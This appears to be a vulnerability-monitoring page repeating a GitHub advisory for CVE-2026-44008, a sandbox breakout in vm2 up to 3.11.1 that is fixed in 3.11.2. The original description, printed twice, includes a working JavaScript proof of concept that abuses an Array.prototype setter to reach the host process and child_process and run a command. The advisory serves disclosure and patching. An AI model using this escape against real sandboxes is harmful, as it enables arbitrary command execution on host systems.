Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.8
CVE-2026-44008: vm2 Sandbox Breakout via `neutralizeArraySpeciesBatch`
GHSA-9qj6-qjgg-37qq
CVE-2026-44008
Summary
A vulnerability in vm2 allows attackers to break out of the sandbox and execute arbitrary commands on the host system. This could happen if an attacker can manipulate the vm2 environment. To protect yourself, make sure to update to the latest version of vm2 and be cautious when using untrusted code in your sandbox.
What to do
- Update GitHub Actions vm2 to version 3.11.2.
- Update vm2 to version 3.11.2.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | GitHub Actions | vm2 |
<= 3.11.1 Fix: upgrade to 3.11.2
|
| npm | – | vm2 |
<= 3.11.1 Fix: upgrade to 3.11.2
|
Original title
vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
Original description
### Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
The new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const a = [];
Object.defineProperty(Array.prototype, 0, {
set(value) {
a.f = Buffer.prototype.inspect;
value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
});
new Buffer(a);
`));
```
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
The new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const a = [];
Object.defineProperty(Array.prototype, 0, {
set(value) {
a.f = Buffer.prototype.inspect;
value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
});
new Buffer(a);
`));
```
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
ghsa CVSS3.1
9.8
Vulnerability type
CWE-668
Published: 8 May 2026 · Updated: 28 May 2026 · First seen: 8 May 2026